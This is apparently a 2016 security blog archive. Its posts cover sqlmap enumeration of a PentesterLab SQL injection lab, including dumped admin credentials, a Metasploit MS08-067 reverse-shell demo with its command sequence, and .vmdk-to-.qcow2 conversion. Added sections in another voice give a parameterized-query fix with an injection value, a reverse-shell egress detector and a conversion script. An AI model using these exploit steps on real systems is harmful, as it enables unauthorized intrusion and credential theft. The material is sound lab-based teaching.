Thursday, 26 May 2016

Pentester Lab SQL Injection Exercise



Pentesterlab.com is one of the online course providers for penetration testing. One of its exercises asks you to test for SQL injection on a vulnerable application. Before you start, you need the ISO file of the vulnerable application. You can download the ISO image here.

Now let's try the exercise.

Notes:

  • Attacker IP: 192.168.0.103

  • Target IP: 192.168.0.102, changed midway to 192.168.0.105

First, run sqlmap on Kali with the banner option. The banner will tell the version of MySQL running on the targeted application. Use the command shown in the following image.



sqlmap will perform the operations needed to detect the version.



Next, the version of MySQL is revealed along with the version of the web server. MySQL was found to be version 5.1.63, which is still vulnerable to SQL injection. Knowing that it is still vulnerable, I tried to get more information about the database.



The following command is used to list the databases available on the target.



The available databases are retrieved. Now we know that there are two databases, information_schema and photoblog. Since the name of the web application is photoblog, I am pretty sure that the database containing the web application's information is the photoblog db. The next step is to get the tables inside the photoblog database.



The following command is used to get the tables of the photoblog database. --tables is used to list the tables. Note that the IP has changed this time, but that does not affect the result of the command.



The available tables are shown once the command finishes. Now we see that there are three tables in the photoblog database: categories, pictures, and users. Based on common knowledge, categories will contain the photo categories, while pictures will be the list of photos/images on the photoblog site. The last table, users, must contain the information of the registered users, including the admin. The next step is to look at the columns of the users table.



Use the following command to get the columns of the users table.



This resulted in the columns id, login, and password. The next step is to dump all the contents of the users table.



The --dump option will output the contents of the users table.



This is the users table along with its contents. Now we know that the login username is admin and the password is P4ssw0rd. The next step is to test the login using admin as the username and P4ssw0rd as the password.



Now go to the login screen of the web application.



There you go. Now you have access as the admin, who can upload images.



Now you know how dangerous it is to expose a parameter in the URL. Therefore, when designing a web application, you need to carefully consider what the user needs to see. Moreover, avoid constructing SQL queries from user input. Using a framework when creating a PHP-based web application is also important, since a framework usually provides a way to query the database that is free from SQL injection vulnerabilities. CodeIgniter, for example, uses Active Record for building queries.
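To make the last paragraph concrete, here is an added example (not code from the post or from PentesterLab's photoblog application) that puts the vulnerable pattern next to its fix. It uses an in-memory SQLite table as a stand-in for the photoblog MySQL database; the table name `pictures` comes from the post, the titles and the tampered parameter value are constructed for the example, and the function names are mine.

```python
import sqlite3

# Constructed stand-in for the photoblog MySQL database from the post: an
# in-memory SQLite table shaped like the `pictures` table sqlmap enumerated.
# Titles are made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pictures (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pictures VALUES (?, ?)",
                     [(1, "first photo"), (2, "second photo"), (3, "third photo")])
    return conn

def lookup_vulnerable(conn, picture_id):
    """Concatenates the URL parameter straight into the SQL text.

    This is the pattern the post exploited: whatever the client sends becomes
    part of the query, so it can change the meaning of the query itself.
    """
    sql = "SELECT id, title FROM pictures WHERE id = " + picture_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, picture_id):
    """Validates the parameter and passes it as a bound value, never as SQL text.

    The placeholder (`?` in sqlite3, `%s` in MySQLdb, a named parameter in
    PDO) guarantees the value is compared as data; the int() check additionally
    rejects any input that is not a plain picture number.
    """
    try:
        pid = int(picture_id)
    except (TypeError, ValueError):
        return []          # reject anything that is not an integer id
    return conn.execute("SELECT id, title FROM pictures WHERE id = ?", (pid,)).fetchall()

# A tampered parameter value (constructed): once concatenated, the WHERE
# clause reads "id = 1 OR 1=1", which is true for every row.
TAMPERED_ID = "1 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", lookup_vulnerable(db, "2"))
    print("vulnerable, tampered     :", lookup_vulnerable(db, TAMPERED_ID))
    print("safe, normal input       :", lookup_safe(db, "2"))
    print("safe, tampered           :", lookup_safe(db, TAMPERED_ID))
```

The vulnerable lookup returns every picture for the tampered value, which is the same root cause sqlmap used above to walk through the whole database; the bound version returns nothing for it and exactly one row for a real id. Framework query builders such as CodeIgniter's Active Record do the binding for you, but only as long as the raw query methods are not fed user input.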


Thursday, 19 May 2016

MS08_067 Vulnerability Demo with Metasploit



A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and through that connection code or command execution is achieved. For this example, I will try to make a reverse shell connection. The setup is represented by the image below:



To build this setup, I will use the ms08_067_netapi vulnerability. MS08 means Microsoft 2008, the year of the patch for this vulnerability; 067 is the patch number of that year (the 67th). The vulnerability is explained here.

First, I select the exploit with the command use windows/smb/ms08_067_netapi. Next I had to set the target host in RHOST. Just type set RHOST 131.107.1.222 to set the target IP address.



Next, run show options to see what has been set up. RHOST now points to 131.107.1.222 and RPORT points to an open port on the target.

The next step is to set the payload. The payload is the code that is executed on the target once the exploit succeeds. This time, to get a reverse shell, the payload that needs to be set is windows/shell/reverse_tcp. For a reverse shell we need to set the listening host (LHOST), because the target connects back to this host. Set LHOST with set LHOST 131.107.1.101. To see LHOST again, execute show options.



This time, show options shows the LHOST information. LHOST will listen on port 4444. The last command is to run the exploit by typing exploit.
 



There you go, I have access to a shell on the target.
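Seen from the target's network, the connection described above is a server opening a TCP session outbound to the listener on port 4444. The following added example (mine, not from the post or from Metasploit) runs that observation as a detection rule over a few constructed firewall-style log lines. The host addresses and port 4444 come from the demo; the log format, the timestamps, the list of servers and the set of expected egress ports are assumptions for the example.

```python
import re

# Constructed firewall-style connection log (not from the post). The host
# addresses and the port 4444 listener match the demo above; everything else,
# including the timestamps and the SMB/DNS lines, is made up.
SAMPLE_LOG = """\
2016-05-19T10:01:02Z src=131.107.1.101 dst=131.107.1.222 proto=tcp dport=445 dir=in
2016-05-19T10:01:05Z src=131.107.1.222 dst=131.107.1.101 proto=tcp dport=4444 dir=out
2016-05-19T10:01:09Z src=131.107.1.222 dst=131.107.1.10 proto=udp dport=53 dir=out
2016-05-19T10:02:00Z this line is not in the expected format
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"proto=(?P<proto>\S+) dport=(?P<dport>\d+) dir=(?P<dir>in|out)$"
)

# Assumed policy: these hosts are servers that should only ever answer
# connections, and the only egress they legitimately need is DNS/HTTP(S).
SERVERS = {"131.107.1.222"}
EXPECTED_EGRESS = {53, 80, 443}

def find_callback_candidates(log_text, servers=SERVERS, expected_egress=EXPECTED_EGRESS):
    """Return (timestamp, src, dst, dport) for each outbound TCP session a
    server opened to a port it has no business reaching.

    A reverse shell shows up as exactly this: the exploited host initiates a
    TCP session to the attacker's listener (port 4444 by default in the demo).
    The rule keys on "server initiating unexpected egress", not on 4444 itself,
    because the listener port is just a setting the operator can change.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue                     # skip unparseable lines instead of crashing
        if m["dir"] != "out" or m["src"] not in servers:
            continue                     # only server-initiated sessions matter here
        if m["proto"] != "tcp":
            continue                     # a shell needs a stream; UDP DNS is fine
        dport = int(m["dport"])
        if dport in expected_egress:
            continue
        hits.append((m["ts"], m["src"], m["dst"], dport))
    return hits

if __name__ == "__main__":
    for hit in find_callback_candidates(SAMPLE_LOG):
        print("server-initiated egress:", hit)
```

On the sample log only the 4444 session is reported; the inbound SMB connection and the DNS lookup are ignored. Because the rule is about egress the server never needs, it also catches a listener moved to 443 only if 443 is removed from the expected set, which is the trade-off to decide per host: the tighter the egress allow-list, the less room a callback has to hide.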

Reference:

  • https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
  • http://resources.infosecinstitute.com/icmp-reverse-shell/

Thursday, 12 May 2016

Convert .vmdk to .qcow2/qemu



VMware and VirtualBox use .vmdk files as their virtual disk format. VMDK (Virtual Machine Disk) is a file format that acts as a container for virtual hard disk drives used by virtual machine monitors. While .vmdk files can be used on many virtual machine monitors, some cannot run .vmdk files and only accept the disk images used by Kernel-based Virtual Machine (KVM). KVM is a virtualization module for the Linux kernel that turns it into a hypervisor. Some of the virtual machine monitors that run on KVM are Proxmox, Kimchi, and OpenQRM.

The trouble begins when we have a running VM in .vmdk format but want to use it on a machine that runs KVM. To do this, we need to convert the .vmdk file into another type. Usually KVM runs with the .qcow2 or .qemu format. After some research, I found out that you need a copy of the .vmdk file first. To make one, VMware Workstation already has a tool called vmware-vdiskmanager, which is located in the VMware Workstation folder.





Confirm it by looking in the folder.



Now, download the qemu image converter, qemu-img. It can be downloaded from here for Windows. Extract it and put the .exe file in the same folder as the target .vmdk files. Now, I convert the .vmdk file into .qcow2.


Once the file has been successfully converted, check it using the check and info commands.



 
The converted file will be available in the VMware Workstation folder.



That's it; this is one way to convert a .vmdk file.
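The exact command lines of the steps above are in images that are not reproduced here, so the following added example (mine, not the post's) assembles the procedure as a small script: clone the disk with vmware-vdiskmanager, convert with qemu-img, run `qemu-img check`, and compare `qemu-img info` of source and result. The `-r`/`-t 0` options for vmware-vdiskmanager (clone into a single growable file) are the standard usage I assume for the "copy of the .vmdk" step; the JSON samples and file names are constructed, and the function names are mine.

```python
import json
import subprocess

def clone_cmd(src_vmdk, clone_vmdk):
    """vmware-vdiskmanager command that clones a disk into a single growable
    .vmdk (-r = convert/clone, -t 0 = single growable file). Assumed standard
    usage for the copy step; the post's exact options are only in an image."""
    return ["vmware-vdiskmanager", "-r", src_vmdk, "-t", "0", clone_vmdk]

def convert_cmd(src_vmdk, dst_qcow2):
    """qemu-img convert from an explicit vmdk source to a qcow2 target.
    -f pins the input format so a wrong auto-detection cannot go unnoticed."""
    return ["qemu-img", "convert", "-f", "vmdk", "-O", "qcow2", src_vmdk, dst_qcow2]

def parse_image_info(info_json_text):
    """Pull format and virtual size out of `qemu-img info --output=json`."""
    info = json.loads(info_json_text)
    return info["format"], int(info["virtual-size"])

def verify_conversion(src_info_json, dst_info_json):
    """The converted image must be qcow2 and present the same virtual disk
    size as the source; a size mismatch means a truncated or wrong image."""
    src_fmt, src_size = parse_image_info(src_info_json)
    dst_fmt, dst_size = parse_image_info(dst_info_json)
    return src_fmt == "vmdk" and dst_fmt == "qcow2" and src_size == dst_size

def run(cmd):
    """Run a tool and return its stdout; a non-zero exit raises immediately."""
    return subprocess.run(cmd, check=True, capture_output=True, text=True).stdout

def convert_and_verify(src_vmdk, dst_qcow2):
    """Runs the conversion plus both checks the post mentions (check + info)."""
    run(convert_cmd(src_vmdk, dst_qcow2))
    run(["qemu-img", "check", dst_qcow2])            # qcow2 consistency check
    src_info = run(["qemu-img", "info", "--output=json", src_vmdk])
    dst_info = run(["qemu-img", "info", "--output=json", dst_qcow2])
    return verify_conversion(src_info, dst_info)

# Constructed samples of `qemu-img info --output=json` output (not captured
# from the post); the file names and the 8 GiB size are made up.
SAMPLE_SRC_INFO = '{"virtual-size": 8589934592, "filename": "lab.vmdk", "format": "vmdk"}'
SAMPLE_DST_INFO = '{"virtual-size": 8589934592, "filename": "lab.qcow2", "format": "qcow2"}'

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print("conversion verified:", convert_and_verify(sys.argv[1], sys.argv[2]))
    else:
        print("sample verification:", verify_conversion(SAMPLE_SRC_INFO, SAMPLE_DST_INFO))
```

Run it as `python convert.py lab.vmdk lab.qcow2` from the folder that holds qemu-img (and vmware-vdiskmanager, if you also call `clone_cmd` first on a split or snapshotted disk). Comparing the two `info` outputs is the point of the verification: `check` only proves the qcow2 container is internally consistent, while the matching virtual size is what tells you the conversion read the whole source disk.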
